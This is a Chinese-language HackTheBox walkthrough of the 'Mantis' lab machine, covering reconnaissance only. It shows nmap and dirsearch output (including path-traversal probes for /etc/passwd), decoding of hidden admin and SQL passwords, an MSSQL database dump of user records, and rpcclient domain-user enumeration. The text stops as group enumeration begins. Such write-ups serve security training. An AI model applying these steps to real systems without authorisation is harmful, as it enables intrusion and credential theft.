

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="World&#39;sEnd">
  <meta name="keywords" content="">
  
    <meta name="description" content="12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB Walkthrough - Mantis">
<meta property="og:url" content="https://crazyinside.github.io/post/HackTheBox-Mantis.html">
<meta property="og:site_name" content="Network Security Notes">
<meta property="og:description" content="12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424154848468.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424155651622.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424162116396.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424160741150.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424160919664.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424164539688.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424164558353.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424165825467.png">
<meta property="article:published_time" content="2023-08-13T22:39:09.018Z">
<meta property="article:modified_time" content="2023-08-13T19:40:46.235Z">
<meta property="article:author" content="World&#39;sEnd">
<meta property="article:tag" content="Active Directory">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424154848468.png">
  
  
  
  <title>HTB Walkthrough - Mantis - Network Security Notes</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"crazyinside.github.io","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"gtag":null},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://raw.githubusercontent.com/Crazyinside/blog.image/main/material/wallhaven-x6dj5z_3840x2160.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HTB Walkthrough - Mantis"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-08-14 06:39" pubdate>
          August 14, 2023 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.8k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          82 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">HTB Walkthrough - Mantis</h1>
            
            
              <div class="markdown-body">
                
                <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># Nmap 7.92 scan initiated Sun Apr 24 15:27:17 2022 as: nmap -sV -sC -p- -Pn -T4 -oA nmap.txt 10.10.10.52</span><br>Nmap scan report <span class="hljs-keyword">for</span> 10.10.10.52<br>Host is up (0.37s latency).<br>Not shown: 65508 closed tcp ports (reset)<br>PORT      STATE SERVICE      VERSION<br>53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)<br>| dns-nsid: <br>|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)<br>88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-24 07:40:10Z)<br>135/tcp   open  msrpc        Microsoft Windows RPC<br>139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn<br>389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)<br>445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)<br>464/tcp   open  kpasswd5?<br>593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0<br>636/tcp   open  tcpwrapped<br>1337/tcp  open  http         Microsoft IIS httpd 7.5<br>|_http-server-header: Microsoft-IIS/7.5<br>|_http-title: IIS7<br>| http-methods: <br>|_  Potentially risky methods: TRACE<br>1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM<br>| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback<br>| Not valid before: 2022-04-24T07:25:23<br>|_Not valid after:  2052-04-24T07:25:23<br>|_ssl-<span class="hljs-built_in">date</span>: 2022-04-24T07:41:25+00:00; 0s from scanner time.<br>| ms-sql-ntlm-info: <br>|   Target_Name: HTB<br>|   NetBIOS_Domain_Name: HTB<br>|   NetBIOS_Computer_Name: MANTIS<br>|   DNS_Domain_Name: htb.local<br>|   DNS_Computer_Name: mantis.htb.local<br>|   DNS_Tree_Name: htb.local<br>|_  Product_Version: 6.1.7601<br>3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)<br>3269/tcp  open  tcpwrapped<br>5722/tcp  open  msrpc        Microsoft Windows RPC<br>8080/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)<br>|_http-open-proxy: Proxy might be redirecting requests<br>|_http-server-header: Microsoft-IIS/7.5<br>|_http-title: Tossed Salad - Blog<br>9389/tcp  open  mc-nmf       .NET Message Framing<br>47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)<br>|_http-server-header: Microsoft-HTTPAPI/2.0<br>|_http-title: Not Found<br>49152/tcp open  msrpc        Microsoft Windows RPC<br>49153/tcp open  msrpc        Microsoft Windows RPC<br>49154/tcp open  msrpc        Microsoft Windows RPC<br>49155/tcp open  msrpc        Microsoft Windows RPC<br>49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0<br>49158/tcp open  msrpc        Microsoft Windows RPC<br>49167/tcp open  msrpc        Microsoft Windows RPC<br>49176/tcp open  msrpc        Microsoft Windows RPC<br>49182/tcp open  msrpc        Microsoft Windows RPC<br>50255/tcp open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000<br>| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback<br>| Not valid before: 2022-04-24T07:25:23<br>|_Not valid after:  2052-04-24T07:25:23<br>|_ssl-<span class="hljs-built_in">date</span>: 2022-04-24T07:41:25+00:00; 0s from scanner time.<br>| ms-sql-ntlm-info: <br>|   Target_Name: HTB<br>|   NetBIOS_Domain_Name: HTB<br>|   NetBIOS_Computer_Name: MANTIS<br>|   DNS_Domain_Name: htb.local<br>|   DNS_Computer_Name: mantis.htb.local<br>|   DNS_Tree_Name: htb.local<br>|_  Product_Version: 6.1.7601<br>Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows<br><br>Host script results:<br>| smb-os-discovery: <br>|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)<br>|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1<br>|   Computer name: mantis<br>|   NetBIOS computer name: MANTIS\x00<br>|   Domain name: htb.local<br>|   Forest name: htb.local<br>|   FQDN: mantis.htb.local<br>|_  System time: 2022-04-24T03:41:09-04:00<br>| ms-sql-info: <br>|   10.10.10.52:1433: <br>|     Version: <br>|       name: Microsoft SQL Server 2014 RTM<br>|       number: 12.00.2000.00<br>|       Product: Microsoft SQL Server 2014<br>|       Service pack level: RTM<br>|       Post-SP patches applied: <span class="hljs-literal">false</span><br>|_    TCP port: 1433<br>|_clock-skew: mean: 34m17s, deviation: 1h30m43s, median: 0s<br>| smb2-security-mode: <br>|   2.1: <br>|_    Message signing enabled and required<br>| smb2-time: <br>|   <span class="hljs-built_in">date</span>: 2022-04-24T07:41:14<br>|_  start_date: 2022-04-24T07:23:53<br>| smb-security-mode: <br>|   account_used: &lt;blank&gt;<br>|   authentication_level: user<br>|   challenge_response: supported<br>|_  message_signing: required<br><br>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br><span class="hljs-comment"># Nmap done at Sun Apr 24 15:41:32 2022 -- 1 IP address (1 host up) scanned in 855.52 seconds</span><br></code></pre></td></tr></table></figure>

<h5 id="HTTP："><a href="#HTTP：" class="headerlink" title="HTTP："></a>HTTP：</h5><img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424154848468.png" srcset="/img/loading.gif" lazyload alt="image-20220424154848468"  />

<p>什么都没有，或许我可以路径爆破看一眼：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ dirsearch -u http://10.10.10.52:1337<br><br>  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                   <br> (_||| _) (/_(_|| (_| )                                                                                                                                                                                            <br>                                                                                                                                                                                                                   <br>Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927<br><br>Output File: /home/worldisend/.dirsearch/reports/10.10.10.52-1337/_22-04-24_15-49-35.txt<br><br>Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-24_15-49-35.<span class="hljs-built_in">log</span><br><br>Target: http://10.10.10.52:1337/<br><br>[15:49:36] Starting: <br>[15:49:39] 403 -  312B  - /%2e%2e//google.com                              <br>[15:49:55] 403 -    2KB - /Trace.axd                                        <br>[15:49:56] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           <br>[15:50:13] 403 -    1KB - /aspnet_client/                                   <br>[15:50:13] 301 -  161B  - /aspnet_client  -&gt;  http://10.10.10.52:1337/aspnet_client/<br>[15:50:15] 301 -  161B  - /secure_notes  -&gt;  http://10.10.10.52:1337/secure_notes/<br>                                                                             <br>Task Completed <br></code></pre></td></tr></table></figure>

<p>在secure_notes下有两个文件一个web.config会报404：</p>
<p><img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424155651622.png" srcset="/img/loading.gif" lazyload alt="image-20220424155651622"></p>
<p>另一个名字特别长的向我表述了这样的信息：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">1. Download OrchardCMS<br>2. Download SQL server 2014 Express ,create user <span class="hljs-string">&quot;admin&quot;</span>,and create orcharddb database<br>3. Launch IIS and add new website and point to Orchard CMS folder location.<br>4. Launch browser and navigate to http://localhost:8080<br>5. Set admin password and configure sQL server connection string.<br>6. Add blog pages with admin user.<br></code></pre></td></tr></table></figure>

<p>看起来像是一个个人博客，用的OrchardCMS，默认开到了8080，哦对目标8080端口是对外开放的。但是信息并没有这么简单，因为右边有个滚动条，可以往下拉很长很长，如果稍微不注意就错过了这条关键信息，如果不是不小心碰了下触摸板，我兴许就会错过：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">Credentials stored <span class="hljs-keyword">in</span> secure format<br>OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001<br>SQL Server sa credentials file namez<br></code></pre></td></tr></table></figure>

<p>这是OrchardCMS管理admin用户的凭据，以二进制形式存储的，但是没关系，我可以解码：</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs dart">$ echo <span class="hljs-string">&quot;010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001&quot;</span> | perl -lpe <span class="hljs-string">&#x27;<span class="hljs-subst">$_</span>=pack&quot;B*&quot;,<span class="hljs-subst">$_</span>&#x27;</span><br><span class="hljs-meta">@dm</span>!n_P<span class="hljs-meta">@ssW</span>0rd!<br></code></pre></td></tr></table></figure>

<p>而且该文件的名字很奇怪，它看起来像是某种编码格式：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx&quot;</span> | <span class="hljs-built_in">base64</span> -d</span> <br>6d2424716c5f53405f504073735730726421<br></code></pre></td></tr></table></figure>

<p>我在Burpsuite编码解码模块中，把该字符串不断的通过Burpsuite内置的解码模块去尝试，当我选择ascii16进制解码时，我把那串看起来像哈希但其实不是的字符串给解码了出来：</p>
<img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424162116396.png" srcset="/img/loading.gif" lazyload alt="image-20220424162116396"  />

<p>我又拿到了一个密码。但我不知道他是做什么的，虽然它告诉了我是mql。我竟然如此轻易的就可以获取到一些关键信息，看来前边的路会艰难，我可以去访问一下8080：</p>
<img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424160741150.png" srcset="/img/loading.gif" lazyload alt="image-20220424160741150"  />

<p>白色背景，隐藏了很多按钮，但这次我不需要像往常一样对它们一一分析甄别，因为这次我有管理账户密码，可以直接登录后台：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">10.10</span>.<span class="hljs-number">10.52</span>/admin<br></code></pre></td></tr></table></figure>

<img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424160919664.png" srcset="/img/loading.gif" lazyload alt="image-20220424160919664"  />

<p>这CMS很眼熟，很多管理程序的web页面，还有团队博客，或是某漏洞靶场平台，但是这个博客我觉得像是混淆视听的：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">$</span> <span class="hljs-string">searchsploit</span> <span class="hljs-string">OrchardCMS</span>                                  <br><span class="hljs-attr">Exploits:</span> <span class="hljs-literal">No</span> <span class="hljs-string">Results</span><br><span class="hljs-attr">Shellcodes:</span> <span class="hljs-literal">No</span> <span class="hljs-string">Results</span><br></code></pre></td></tr></table></figure>

<p>因为它没有公开漏洞，而且搜索引擎中的漏洞也都只有漏洞信息公告，没有具体说明。或许我不应该把它放在优先位去探寻，因为目标还有很多其他端口。</p>
<h5 id="SQL："><a href="#SQL：" class="headerlink" title="SQL："></a>SQL：</h5><p>我可以尝试登录1433，它可以工作：</p>
<figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl">$ sqsh -S <span class="hljs-number">10.10</span>.<span class="hljs-number">10.52</span> -U admin                          <br>sqsh-<span class="hljs-number">2.5</span>.<span class="hljs-number">16.1</span> Copyright (C) <span class="hljs-number">1995</span>-<span class="hljs-number">2001</span> Scott C. Gray<br>Portions Copyright (C) <span class="hljs-number">2004</span>-<span class="hljs-number">2014</span> Michael Peppler and Martin Wesdorp<br>This is free software with ABSOLUTELY NO WARRANTY<br>For more information type <span class="hljs-string">&#x27;\warranty&#x27;</span><br>Password: <br><span class="hljs-meta prompt_">1&gt; </span><br></code></pre></td></tr></table></figure>

<p><strong>查询所有数据库</strong>：</p>
<figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl"><span class="hljs-meta prompt_">1&gt; </span>SELECT * FROM SYSDATABASES<br><span class="hljs-meta prompt_">2&gt; </span>go<br></code></pre></td></tr></table></figure>

<p>信息不多，但是它的格式让我很难复制过来放在这里，而且也无关紧要，我只放关键的：</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs crmsh"><span class="hljs-keyword">master</span>                                                                                               <br><span class="hljs-title">tempdb</span>                                                                                               <br>model                                                                                               <br>msdb                                                                                                 <br>orcharddb                 <br></code></pre></td></tr></table></figure>

<p>五个数据库，以及它们的目录，都是这样的格式：</p>
<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs moonscript"><span class="hljs-name">C</span>:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\orcharddb.mdf   <br></code></pre></td></tr></table></figure>

<h5 id="IP-10-10-10-52-445-Name-htb-local-获取orcharddb-数据库的所有表："><a href="#IP-10-10-10-52-445-Name-htb-local-获取orcharddb-数据库的所有表：" class="headerlink" title="[+] IP: 10.10.10.52:445 Name: htb.local               获取orcharddb 数据库的所有表："></a>[+] IP: 10.10.10.52:445 Name: htb.local               获取orcharddb 数据库的所有表：</h5><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl"><span class="hljs-meta prompt_">1&gt; </span>SELECT * FROM orcharddb.INFORMATION_SCHEMA.TABLES<br><span class="hljs-meta prompt_">2&gt; </span>go<br></code></pre></td></tr></table></figure>

<p>信息也很多，费眼睛。</p>
<h5 id="获取orcharddb-数据库的所有列："><a href="#获取orcharddb-数据库的所有列：" class="headerlink" title="获取orcharddb 数据库的所有列："></a>获取orcharddb 数据库的所有列：</h5><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl"><span class="hljs-meta prompt_">1&gt; </span>SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS<br><span class="hljs-meta prompt_">2&gt; </span>go<br></code></pre></td></tr></table></figure>

<p>这东西最好找个图形化数据库连接工具，要不真的是在给自己找罪受。</p>
<h5 id="获取博客用户记录："><a href="#获取博客用户记录：" class="headerlink" title="获取博客用户记录："></a>获取博客用户记录：</h5><p>在orcharddb中有这么一个表，它的名字是blog_Orchard_Users_UserPartRecord，用户记录：</p>
<figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl"><span class="hljs-meta prompt_">1&gt; </span>use orcharddb<br><span class="hljs-meta prompt_">2&gt; </span>go<br><span class="hljs-meta prompt_">1&gt; </span>SELECT * FROM blog_Orchard_Users_UserPartRecord<br><span class="hljs-meta prompt_">2&gt; </span>go<br></code></pre></td></tr></table></figure>

<p>其中会包含一些信息，我还是截图吧。。。。</p>
<img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424164539688.png" srcset="/img/loading.gif" lazyload alt="image-20220424164539688"  />

<img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424164558353.png" srcset="/img/loading.gif" lazyload alt="image-20220424164558353"  />

<p>它看起来像是个域用户，看起来还获取到了它的密码。验证其合法不合法也简单，我去rpc试一下就可以：</p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs inform7">$ rpcclient -U james 10.10.10.52                        <br>Enter WORKGROUP\james&#x27;s password: <br>rpcclient $&gt; enumdomusers<br>user:<span class="hljs-comment">[Administrator]</span> rid:<span class="hljs-comment">[0x1f4]</span><br>user:<span class="hljs-comment">[Guest]</span> rid:<span class="hljs-comment">[0x1f5]</span><br>user:<span class="hljs-comment">[krbtgt]</span> rid:<span class="hljs-comment">[0x1f6]</span><br>user:<span class="hljs-comment">[james]</span> rid:<span class="hljs-comment">[0x44f]</span><br>rpcclient $&gt;<br></code></pre></td></tr></table></figure>

<p>我可以获取目标的系统版本：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">rpcclient</span> $&gt; srvinfo<br>        <span class="hljs-attribute">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">52</span>    Wk Sv Sql PDC Tim NT <br>        <span class="hljs-attribute">platform_id</span>     :       <span class="hljs-number">500</span><br>        <span class="hljs-attribute">os</span> version      :       <span class="hljs-number">6</span>.<span class="hljs-number">1</span><br>        <span class="hljs-attribute">server</span> type     :       <span class="hljs-number">0</span>x80102f<br><span class="hljs-attribute">rpcclient</span> $&gt; <br></code></pre></td></tr></table></figure>

<p>可以在这个url对版本号进行比对：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>en.wikipedia.org<span class="hljs-regexp">/wiki/</span>Comparison_of_Microsoft_Windows_versions<br></code></pre></td></tr></table></figure>

<img src="https://raw.githubusercontent.com/Crazyinside/blog.image/main/Oldimage/image-20220424165825467.png" srcset="/img/loading.gif" lazyload alt="image-20220424165825467"  />

<p>Nmap为我枚举是2008 R2，与之对的上。看起来目标应该是Windows 2008 R2系统。</p>
<p>我可以枚举一些域内的组：</p>
